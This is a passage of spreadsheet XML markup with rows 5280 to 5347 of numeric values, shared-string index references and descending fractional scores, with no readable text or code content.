      <c r="C5280" s="2" t="s">
        <v>5048</v>
      </c>
      <c r="D5280" s="2">
        <v>1.0</v>
      </c>
      <c r="E5280" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5280" s="2">
        <v>0.1733716475095786</v>
      </c>
    </row>
    <row r="5281" ht="15.75" customHeight="1">
      <c r="A5281" s="1">
        <v>24994.0</v>
      </c>
      <c r="B5281" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C5281" s="2" t="s">
        <v>5049</v>
      </c>
      <c r="D5281" s="2">
        <v>1.0</v>
      </c>
      <c r="E5281" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5281" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="5282" ht="15.75" customHeight="1">
      <c r="A5282" s="1">
        <v>32628.0</v>
      </c>
      <c r="B5282" s="2">
        <v>5845767.0</v>
      </c>
      <c r="C5282" s="2" t="s">
        <v>5050</v>
      </c>
      <c r="D5282" s="2">
        <v>1.0</v>
      </c>
      <c r="E5282" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5282" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="5283" ht="15.75" customHeight="1">
      <c r="A5283" s="1">
        <v>33960.0</v>
      </c>
      <c r="B5283" s="2">
        <v>9334794.0</v>
      </c>
      <c r="C5283" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="D5283" s="2">
        <v>1.0</v>
      </c>
      <c r="E5283" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5283" s="2">
        <v>0.1730769230769231</v>
      </c>
    </row>
    <row r="5284" ht="15.75" customHeight="1">
      <c r="A5284" s="1">
        <v>33997.0</v>
      </c>
      <c r="B5284" s="2">
        <v>9452355.0</v>
      </c>
      <c r="C5284" s="2" t="s">
        <v>5052</v>
      </c>
      <c r="D5284" s="2">
        <v>1.0</v>
      </c>
      <c r="E5284" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5284" s="2">
        <v>0.1729024943310658</v>
      </c>
    </row>
    <row r="5285" ht="15.75" customHeight="1">
      <c r="A5285" s="1">
        <v>33871.0</v>
      </c>
      <c r="B5285" s="2">
        <v>9106050.0</v>
      </c>
      <c r="C5285" s="2" t="s">
        <v>5053</v>
      </c>
      <c r="D5285" s="2">
        <v>1.0</v>
      </c>
      <c r="E5285" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5285" s="2">
        <v>0.1727430555555556</v>
      </c>
    </row>
    <row r="5286" ht="15.75" customHeight="1">
      <c r="A5286" s="1">
        <v>30855.0</v>
      </c>
      <c r="B5286" s="2">
        <v>4.6120713E7</v>
      </c>
      <c r="C5286" s="2" t="s">
        <v>5054</v>
      </c>
      <c r="D5286" s="2">
        <v>1.0</v>
      </c>
      <c r="E5286" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5286" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="5287" ht="15.75" customHeight="1">
      <c r="A5287" s="1">
        <v>33948.0</v>
      </c>
      <c r="B5287" s="2">
        <v>9299843.0</v>
      </c>
      <c r="C5287" s="2" t="s">
        <v>5055</v>
      </c>
      <c r="D5287" s="2">
        <v>1.0</v>
      </c>
      <c r="E5287" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5287" s="2">
        <v>0.1722222222222223</v>
      </c>
    </row>
    <row r="5288" ht="15.75" customHeight="1">
      <c r="A5288" s="1">
        <v>22045.0</v>
      </c>
      <c r="B5288" s="2">
        <v>3.026664E7</v>
      </c>
      <c r="C5288" s="2" t="s">
        <v>5056</v>
      </c>
      <c r="D5288" s="2">
        <v>1.0</v>
      </c>
      <c r="E5288" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5288" s="2">
        <v>0.1721311475409837</v>
      </c>
    </row>
    <row r="5289" ht="15.75" customHeight="1">
      <c r="A5289" s="1">
        <v>30850.0</v>
      </c>
      <c r="B5289" s="2">
        <v>4.59735E7</v>
      </c>
      <c r="C5289" s="2" t="s">
        <v>5057</v>
      </c>
      <c r="D5289" s="2">
        <v>1.0</v>
      </c>
      <c r="E5289" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5289" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="5290" ht="15.75" customHeight="1">
      <c r="A5290" s="1">
        <v>32167.0</v>
      </c>
      <c r="B5290" s="2">
        <v>5.4559824E7</v>
      </c>
      <c r="C5290" s="2" t="s">
        <v>5058</v>
      </c>
      <c r="D5290" s="2">
        <v>1.0</v>
      </c>
      <c r="E5290" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5290" s="2">
        <v>0.1716417910447762</v>
      </c>
    </row>
    <row r="5291" ht="15.75" customHeight="1">
      <c r="A5291" s="1">
        <v>24823.0</v>
      </c>
      <c r="B5291" s="2">
        <v>1.2094967E7</v>
      </c>
      <c r="C5291" s="2" t="s">
        <v>5059</v>
      </c>
      <c r="D5291" s="2">
        <v>1.0</v>
      </c>
      <c r="E5291" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5291" s="2">
        <v>0.1714975845410628</v>
      </c>
    </row>
    <row r="5292" ht="15.75" customHeight="1">
      <c r="A5292" s="1">
        <v>26842.0</v>
      </c>
      <c r="B5292" s="2">
        <v>1.8956831E7</v>
      </c>
      <c r="C5292" s="2" t="s">
        <v>5060</v>
      </c>
      <c r="D5292" s="2">
        <v>1.0</v>
      </c>
      <c r="E5292" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5292" s="2">
        <v>0.1714456391875747</v>
      </c>
    </row>
    <row r="5293" ht="15.75" customHeight="1">
      <c r="A5293" s="1">
        <v>28065.0</v>
      </c>
      <c r="B5293" s="2">
        <v>2.4609611E7</v>
      </c>
      <c r="C5293" s="2" t="s">
        <v>5061</v>
      </c>
      <c r="D5293" s="2">
        <v>1.0</v>
      </c>
      <c r="E5293" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5293" s="2">
        <v>0.1707818930041153</v>
      </c>
    </row>
    <row r="5294" ht="15.75" customHeight="1">
      <c r="A5294" s="1">
        <v>32058.0</v>
      </c>
      <c r="B5294" s="2">
        <v>5377956.0</v>
      </c>
      <c r="C5294" s="2" t="s">
        <v>5062</v>
      </c>
      <c r="D5294" s="2">
        <v>1.0</v>
      </c>
      <c r="E5294" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5294" s="2">
        <v>0.1707818930041153</v>
      </c>
    </row>
    <row r="5295" ht="15.75" customHeight="1">
      <c r="A5295" s="1">
        <v>26488.0</v>
      </c>
      <c r="B5295" s="2">
        <v>1.7514732E7</v>
      </c>
      <c r="C5295" s="2" t="s">
        <v>5007</v>
      </c>
      <c r="D5295" s="2">
        <v>1.0</v>
      </c>
      <c r="E5295" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5295" s="2">
        <v>0.1707516339869282</v>
      </c>
    </row>
    <row r="5296" ht="15.75" customHeight="1">
      <c r="A5296" s="1">
        <v>30259.0</v>
      </c>
      <c r="B5296" s="2">
        <v>3.7623189E7</v>
      </c>
      <c r="C5296" s="2" t="s">
        <v>5063</v>
      </c>
      <c r="D5296" s="2">
        <v>1.0</v>
      </c>
      <c r="E5296" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5296" s="2">
        <v>0.1706349206349207</v>
      </c>
    </row>
    <row r="5297" ht="15.75" customHeight="1">
      <c r="A5297" s="1">
        <v>30427.0</v>
      </c>
      <c r="B5297" s="2">
        <v>3.8949508E7</v>
      </c>
      <c r="C5297" s="2" t="s">
        <v>5064</v>
      </c>
      <c r="D5297" s="2">
        <v>1.0</v>
      </c>
      <c r="E5297" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5297" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="5298" ht="15.75" customHeight="1">
      <c r="A5298" s="1">
        <v>33595.0</v>
      </c>
      <c r="B5298" s="2">
        <v>8331584.0</v>
      </c>
      <c r="C5298" s="2" t="s">
        <v>5065</v>
      </c>
      <c r="D5298" s="2">
        <v>1.0</v>
      </c>
      <c r="E5298" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5298" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="5299" ht="15.75" customHeight="1">
      <c r="A5299" s="1">
        <v>26821.0</v>
      </c>
      <c r="B5299" s="2">
        <v>1.8817823E7</v>
      </c>
      <c r="C5299" s="2" t="s">
        <v>5066</v>
      </c>
      <c r="D5299" s="2">
        <v>1.0</v>
      </c>
      <c r="E5299" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5299" s="2">
        <v>0.1701030927835052</v>
      </c>
    </row>
    <row r="5300" ht="15.75" customHeight="1">
      <c r="A5300" s="1">
        <v>21644.0</v>
      </c>
      <c r="B5300" s="2">
        <v>2.4790515E7</v>
      </c>
      <c r="C5300" s="2" t="s">
        <v>5067</v>
      </c>
      <c r="D5300" s="2">
        <v>1.0</v>
      </c>
      <c r="E5300" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5300" s="2">
        <v>0.1700854700854701</v>
      </c>
    </row>
    <row r="5301" ht="15.75" customHeight="1">
      <c r="A5301" s="1">
        <v>32801.0</v>
      </c>
      <c r="B5301" s="2">
        <v>6160881.0</v>
      </c>
      <c r="C5301" s="2" t="s">
        <v>5068</v>
      </c>
      <c r="D5301" s="2">
        <v>1.0</v>
      </c>
      <c r="E5301" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5301" s="2">
        <v>0.1698872785829308</v>
      </c>
    </row>
    <row r="5302" ht="15.75" customHeight="1">
      <c r="A5302" s="1">
        <v>24781.0</v>
      </c>
      <c r="B5302" s="2">
        <v>1.1913288E7</v>
      </c>
      <c r="C5302" s="2" t="s">
        <v>5069</v>
      </c>
      <c r="D5302" s="2">
        <v>1.0</v>
      </c>
      <c r="E5302" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5302" s="2">
        <v>0.1697965571205008</v>
      </c>
    </row>
    <row r="5303" ht="15.75" customHeight="1">
      <c r="A5303" s="1">
        <v>30952.0</v>
      </c>
      <c r="B5303" s="2">
        <v>4.7365413E7</v>
      </c>
      <c r="C5303" s="2" t="s">
        <v>5070</v>
      </c>
      <c r="D5303" s="2">
        <v>1.0</v>
      </c>
      <c r="E5303" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5303" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="5304" ht="15.75" customHeight="1">
      <c r="A5304" s="1">
        <v>20794.0</v>
      </c>
      <c r="B5304" s="2">
        <v>1.5238697E7</v>
      </c>
      <c r="C5304" s="2" t="s">
        <v>5071</v>
      </c>
      <c r="D5304" s="2">
        <v>1.0</v>
      </c>
      <c r="E5304" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5304" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="5305" ht="15.75" customHeight="1">
      <c r="A5305" s="1">
        <v>21091.0</v>
      </c>
      <c r="B5305" s="2">
        <v>1.8062125E7</v>
      </c>
      <c r="C5305" s="2" t="s">
        <v>5072</v>
      </c>
      <c r="D5305" s="2">
        <v>1.0</v>
      </c>
      <c r="E5305" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5305" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="5306" ht="15.75" customHeight="1">
      <c r="A5306" s="1">
        <v>21553.0</v>
      </c>
      <c r="B5306" s="2">
        <v>2.3597916E7</v>
      </c>
      <c r="C5306" s="2" t="s">
        <v>5073</v>
      </c>
      <c r="D5306" s="2">
        <v>1.0</v>
      </c>
      <c r="E5306" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5306" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="5307" ht="15.75" customHeight="1">
      <c r="A5307" s="1">
        <v>27889.0</v>
      </c>
      <c r="B5307" s="2">
        <v>2.3597915E7</v>
      </c>
      <c r="C5307" s="2" t="s">
        <v>5073</v>
      </c>
      <c r="D5307" s="2">
        <v>1.0</v>
      </c>
      <c r="E5307" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5307" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="5308" ht="15.75" customHeight="1">
      <c r="A5308" s="1">
        <v>28371.0</v>
      </c>
      <c r="B5308" s="2">
        <v>2.6042846E7</v>
      </c>
      <c r="C5308" s="2" t="s">
        <v>5074</v>
      </c>
      <c r="D5308" s="2">
        <v>1.0</v>
      </c>
      <c r="E5308" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5308" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="5309" ht="15.75" customHeight="1">
      <c r="A5309" s="1">
        <v>32660.0</v>
      </c>
      <c r="B5309" s="2">
        <v>5912331.0</v>
      </c>
      <c r="C5309" s="2" t="s">
        <v>5075</v>
      </c>
      <c r="D5309" s="2">
        <v>1.0</v>
      </c>
      <c r="E5309" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5309" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="5310" ht="15.75" customHeight="1">
      <c r="A5310" s="1">
        <v>29855.0</v>
      </c>
      <c r="B5310" s="2">
        <v>3.5770741E7</v>
      </c>
      <c r="C5310" s="2" t="s">
        <v>5076</v>
      </c>
      <c r="D5310" s="2">
        <v>1.0</v>
      </c>
      <c r="E5310" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5310" s="2">
        <v>0.1692708333333333</v>
      </c>
    </row>
    <row r="5311" ht="15.75" customHeight="1">
      <c r="A5311" s="1">
        <v>33177.0</v>
      </c>
      <c r="B5311" s="2">
        <v>7103297.0</v>
      </c>
      <c r="C5311" s="2" t="s">
        <v>5077</v>
      </c>
      <c r="D5311" s="2">
        <v>1.0</v>
      </c>
      <c r="E5311" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5311" s="2">
        <v>0.16916354556804</v>
      </c>
    </row>
    <row r="5312" ht="15.75" customHeight="1">
      <c r="A5312" s="1">
        <v>26061.0</v>
      </c>
      <c r="B5312" s="2">
        <v>1.5541243E7</v>
      </c>
      <c r="C5312" s="2" t="s">
        <v>5078</v>
      </c>
      <c r="D5312" s="2">
        <v>1.0</v>
      </c>
      <c r="E5312" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5312" s="2">
        <v>0.1689814814814815</v>
      </c>
    </row>
    <row r="5313" ht="15.75" customHeight="1">
      <c r="A5313" s="1">
        <v>27149.0</v>
      </c>
      <c r="B5313" s="2">
        <v>2.0775019E7</v>
      </c>
      <c r="C5313" s="2" t="s">
        <v>5079</v>
      </c>
      <c r="D5313" s="2">
        <v>1.0</v>
      </c>
      <c r="E5313" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5313" s="2">
        <v>0.1689814814814815</v>
      </c>
    </row>
    <row r="5314" ht="15.75" customHeight="1">
      <c r="A5314" s="1">
        <v>27244.0</v>
      </c>
      <c r="B5314" s="2">
        <v>2.1054836E7</v>
      </c>
      <c r="C5314" s="2" t="s">
        <v>5080</v>
      </c>
      <c r="D5314" s="2">
        <v>1.0</v>
      </c>
      <c r="E5314" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5314" s="2">
        <v>0.1683760683760684</v>
      </c>
    </row>
    <row r="5315" ht="15.75" customHeight="1">
      <c r="A5315" s="1">
        <v>28727.0</v>
      </c>
      <c r="B5315" s="2">
        <v>2.794579E7</v>
      </c>
      <c r="C5315" s="2" t="s">
        <v>5081</v>
      </c>
      <c r="D5315" s="2">
        <v>1.0</v>
      </c>
      <c r="E5315" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5315" s="2">
        <v>0.1683760683760684</v>
      </c>
    </row>
    <row r="5316" ht="15.75" customHeight="1">
      <c r="A5316" s="1">
        <v>26062.0</v>
      </c>
      <c r="B5316" s="2">
        <v>1.5541323E7</v>
      </c>
      <c r="C5316" s="2" t="s">
        <v>5082</v>
      </c>
      <c r="D5316" s="2">
        <v>1.0</v>
      </c>
      <c r="E5316" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5316" s="2">
        <v>0.1681887366818874</v>
      </c>
    </row>
    <row r="5317" ht="15.75" customHeight="1">
      <c r="A5317" s="1">
        <v>25479.0</v>
      </c>
      <c r="B5317" s="2">
        <v>1.4019762E7</v>
      </c>
      <c r="C5317" s="2" t="s">
        <v>5083</v>
      </c>
      <c r="D5317" s="2">
        <v>1.0</v>
      </c>
      <c r="E5317" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5317" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="5318" ht="15.75" customHeight="1">
      <c r="A5318" s="1">
        <v>25947.0</v>
      </c>
      <c r="B5318" s="2">
        <v>1.5238696E7</v>
      </c>
      <c r="C5318" s="2" t="s">
        <v>5071</v>
      </c>
      <c r="D5318" s="2">
        <v>1.0</v>
      </c>
      <c r="E5318" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5318" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="5319" ht="15.75" customHeight="1">
      <c r="A5319" s="1">
        <v>28413.0</v>
      </c>
      <c r="B5319" s="2">
        <v>2.6359515E7</v>
      </c>
      <c r="C5319" s="2" t="s">
        <v>5084</v>
      </c>
      <c r="D5319" s="2">
        <v>1.0</v>
      </c>
      <c r="E5319" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5319" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="5320" ht="15.75" customHeight="1">
      <c r="A5320" s="1">
        <v>29701.0</v>
      </c>
      <c r="B5320" s="2">
        <v>3.4360944E7</v>
      </c>
      <c r="C5320" s="2" t="s">
        <v>5085</v>
      </c>
      <c r="D5320" s="2">
        <v>1.0</v>
      </c>
      <c r="E5320" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5320" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="5321" ht="15.75" customHeight="1">
      <c r="A5321" s="1">
        <v>33075.0</v>
      </c>
      <c r="B5321" s="2">
        <v>6877144.0</v>
      </c>
      <c r="C5321" s="2" t="s">
        <v>5086</v>
      </c>
      <c r="D5321" s="2">
        <v>1.0</v>
      </c>
      <c r="E5321" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5321" s="2">
        <v>0.1674382716049383</v>
      </c>
    </row>
    <row r="5322" ht="15.75" customHeight="1">
      <c r="A5322" s="1">
        <v>23414.0</v>
      </c>
      <c r="B5322" s="2">
        <v>5603427.0</v>
      </c>
      <c r="C5322" s="2" t="s">
        <v>5087</v>
      </c>
      <c r="D5322" s="2">
        <v>1.0</v>
      </c>
      <c r="E5322" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5322" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5323" ht="15.75" customHeight="1">
      <c r="A5323" s="1">
        <v>26526.0</v>
      </c>
      <c r="B5323" s="2">
        <v>1.769219E7</v>
      </c>
      <c r="C5323" s="2" t="s">
        <v>5088</v>
      </c>
      <c r="D5323" s="2">
        <v>1.0</v>
      </c>
      <c r="E5323" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5323" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5324" ht="15.75" customHeight="1">
      <c r="A5324" s="1">
        <v>26564.0</v>
      </c>
      <c r="B5324" s="2">
        <v>1.7843099E7</v>
      </c>
      <c r="C5324" s="2" t="s">
        <v>5089</v>
      </c>
      <c r="D5324" s="2">
        <v>1.0</v>
      </c>
      <c r="E5324" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5324" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5325" ht="15.75" customHeight="1">
      <c r="A5325" s="1">
        <v>30306.0</v>
      </c>
      <c r="B5325" s="2">
        <v>3.793778E7</v>
      </c>
      <c r="C5325" s="2" t="s">
        <v>5090</v>
      </c>
      <c r="D5325" s="2">
        <v>1.0</v>
      </c>
      <c r="E5325" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5325" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5326" ht="15.75" customHeight="1">
      <c r="A5326" s="1">
        <v>31088.0</v>
      </c>
      <c r="B5326" s="2">
        <v>4.8412612E7</v>
      </c>
      <c r="C5326" s="2" t="s">
        <v>5091</v>
      </c>
      <c r="D5326" s="2">
        <v>1.0</v>
      </c>
      <c r="E5326" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5326" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5327" ht="15.75" customHeight="1">
      <c r="A5327" s="1">
        <v>31192.0</v>
      </c>
      <c r="B5327" s="2">
        <v>4918684.0</v>
      </c>
      <c r="C5327" s="2" t="s">
        <v>5092</v>
      </c>
      <c r="D5327" s="2">
        <v>1.0</v>
      </c>
      <c r="E5327" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5327" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5328" ht="15.75" customHeight="1">
      <c r="A5328" s="1">
        <v>31244.0</v>
      </c>
      <c r="B5328" s="2">
        <v>4.9310434E7</v>
      </c>
      <c r="C5328" s="2" t="s">
        <v>5093</v>
      </c>
      <c r="D5328" s="2">
        <v>1.0</v>
      </c>
      <c r="E5328" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5328" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5329" ht="15.75" customHeight="1">
      <c r="A5329" s="1">
        <v>32006.0</v>
      </c>
      <c r="B5329" s="2">
        <v>5.344631E7</v>
      </c>
      <c r="C5329" s="2" t="s">
        <v>5094</v>
      </c>
      <c r="D5329" s="2">
        <v>1.0</v>
      </c>
      <c r="E5329" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5329" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5330" ht="15.75" customHeight="1">
      <c r="A5330" s="1">
        <v>32156.0</v>
      </c>
      <c r="B5330" s="2">
        <v>5.4316576E7</v>
      </c>
      <c r="C5330" s="2" t="s">
        <v>5095</v>
      </c>
      <c r="D5330" s="2">
        <v>1.0</v>
      </c>
      <c r="E5330" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5330" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5331" ht="15.75" customHeight="1">
      <c r="A5331" s="1">
        <v>32372.0</v>
      </c>
      <c r="B5331" s="2">
        <v>5603426.0</v>
      </c>
      <c r="C5331" s="2" t="s">
        <v>5087</v>
      </c>
      <c r="D5331" s="2">
        <v>1.0</v>
      </c>
      <c r="E5331" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5331" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5332" ht="15.75" customHeight="1">
      <c r="A5332" s="1">
        <v>33463.0</v>
      </c>
      <c r="B5332" s="2">
        <v>7944159.0</v>
      </c>
      <c r="C5332" s="2" t="s">
        <v>5096</v>
      </c>
      <c r="D5332" s="2">
        <v>1.0</v>
      </c>
      <c r="E5332" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5332" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="5333" ht="15.75" customHeight="1">
      <c r="A5333" s="1">
        <v>30685.0</v>
      </c>
      <c r="B5333" s="2">
        <v>4.2493426E7</v>
      </c>
      <c r="C5333" s="2" t="s">
        <v>5097</v>
      </c>
      <c r="D5333" s="2">
        <v>1.0</v>
      </c>
      <c r="E5333" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5333" s="2">
        <v>0.1661220043572985</v>
      </c>
    </row>
    <row r="5334" ht="15.75" customHeight="1">
      <c r="A5334" s="1">
        <v>26012.0</v>
      </c>
      <c r="B5334" s="2">
        <v>1.5349082E7</v>
      </c>
      <c r="C5334" s="2" t="s">
        <v>5098</v>
      </c>
      <c r="D5334" s="2">
        <v>1.0</v>
      </c>
      <c r="E5334" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5334" s="2">
        <v>0.1658249158249159</v>
      </c>
    </row>
    <row r="5335" ht="15.75" customHeight="1">
      <c r="A5335" s="1">
        <v>25199.0</v>
      </c>
      <c r="B5335" s="2">
        <v>1.3206231E7</v>
      </c>
      <c r="C5335" s="2" t="s">
        <v>5099</v>
      </c>
      <c r="D5335" s="2">
        <v>1.0</v>
      </c>
      <c r="E5335" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5335" s="2">
        <v>0.1657706093189965</v>
      </c>
    </row>
    <row r="5336" ht="15.75" customHeight="1">
      <c r="A5336" s="1">
        <v>31087.0</v>
      </c>
      <c r="B5336" s="2">
        <v>4.8412612E7</v>
      </c>
      <c r="C5336" s="2" t="s">
        <v>5100</v>
      </c>
      <c r="D5336" s="2">
        <v>1.0</v>
      </c>
      <c r="E5336" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5336" s="2">
        <v>0.1657706093189965</v>
      </c>
    </row>
    <row r="5337" ht="15.75" customHeight="1">
      <c r="A5337" s="1">
        <v>21792.0</v>
      </c>
      <c r="B5337" s="2">
        <v>2.6610341E7</v>
      </c>
      <c r="C5337" s="2" t="s">
        <v>5101</v>
      </c>
      <c r="D5337" s="2">
        <v>1.0</v>
      </c>
      <c r="E5337" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5337" s="2">
        <v>0.1657407407407408</v>
      </c>
    </row>
    <row r="5338" ht="15.75" customHeight="1">
      <c r="A5338" s="1">
        <v>33408.0</v>
      </c>
      <c r="B5338" s="2">
        <v>7731486.0</v>
      </c>
      <c r="C5338" s="2" t="s">
        <v>5102</v>
      </c>
      <c r="D5338" s="2">
        <v>1.0</v>
      </c>
      <c r="E5338" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5338" s="2">
        <v>0.1657407407407407</v>
      </c>
    </row>
    <row r="5339" ht="15.75" customHeight="1">
      <c r="A5339" s="1">
        <v>25921.0</v>
      </c>
      <c r="B5339" s="2">
        <v>1.5177982E7</v>
      </c>
      <c r="C5339" s="2" t="s">
        <v>5103</v>
      </c>
      <c r="D5339" s="2">
        <v>1.0</v>
      </c>
      <c r="E5339" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5339" s="2">
        <v>0.1650082918739636</v>
      </c>
    </row>
    <row r="5340" ht="15.75" customHeight="1">
      <c r="A5340" s="1">
        <v>31943.0</v>
      </c>
      <c r="B5340" s="2">
        <v>5.3091028E7</v>
      </c>
      <c r="C5340" s="2" t="s">
        <v>5104</v>
      </c>
      <c r="D5340" s="2">
        <v>1.0</v>
      </c>
      <c r="E5340" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5340" s="2">
        <v>0.1650082918739635</v>
      </c>
    </row>
    <row r="5341" ht="15.75" customHeight="1">
      <c r="A5341" s="1">
        <v>27055.0</v>
      </c>
      <c r="B5341" s="2">
        <v>2.0319717E7</v>
      </c>
      <c r="C5341" s="2" t="s">
        <v>5105</v>
      </c>
      <c r="D5341" s="2">
        <v>1.0</v>
      </c>
      <c r="E5341" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5341" s="2">
        <v>0.1649029982363316</v>
      </c>
    </row>
    <row r="5342" ht="15.75" customHeight="1">
      <c r="A5342" s="1">
        <v>34120.0</v>
      </c>
      <c r="B5342" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C5342" s="2" t="s">
        <v>5065</v>
      </c>
      <c r="D5342" s="2">
        <v>1.0</v>
      </c>
      <c r="E5342" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5342" s="2">
        <v>0.164783427495292</v>
      </c>
    </row>
    <row r="5343" ht="15.75" customHeight="1">
      <c r="A5343" s="1">
        <v>31993.0</v>
      </c>
      <c r="B5343" s="2">
        <v>5330389.0</v>
      </c>
      <c r="C5343" s="2" t="s">
        <v>5106</v>
      </c>
      <c r="D5343" s="2">
        <v>1.0</v>
      </c>
      <c r="E5343" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5343" s="2">
        <v>0.1647834274952919</v>
      </c>
    </row>
    <row r="5344" ht="15.75" customHeight="1">
      <c r="A5344" s="1">
        <v>31403.0</v>
      </c>
      <c r="B5344" s="2">
        <v>5.0024241E7</v>
      </c>
      <c r="C5344" s="2" t="s">
        <v>5107</v>
      </c>
      <c r="D5344" s="2">
        <v>1.0</v>
      </c>
      <c r="E5344" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5344" s="2">
        <v>0.1647286821705427</v>
      </c>
    </row>
    <row r="5345" ht="15.75" customHeight="1">
      <c r="A5345" s="1">
        <v>26050.0</v>
      </c>
      <c r="B5345" s="2">
        <v>1.5513514E7</v>
      </c>
      <c r="C5345" s="2" t="s">
        <v>5100</v>
      </c>
      <c r="D5345" s="2">
        <v>1.0</v>
      </c>
      <c r="E5345" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5345" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="5346" ht="15.75" customHeight="1">
      <c r="A5346" s="1">
        <v>30720.0</v>
      </c>
      <c r="B5346" s="2">
        <v>4.3483441E7</v>
      </c>
      <c r="C5346" s="2" t="s">
        <v>5108</v>
      </c>
      <c r="D5346" s="2">
        <v>1.0</v>
      </c>
      <c r="E5346" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5346" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="5347" ht="15.75" customHeight="1">
      <c r="A5347" s="1">
        <v>6466.0</v>
      </c>
      <c r="B5347" s="2">
        <v>4.8638344E7</v>
      </c>
      <c r="C5347" s="2" t="s">
        <v>5109</v>
      </c>
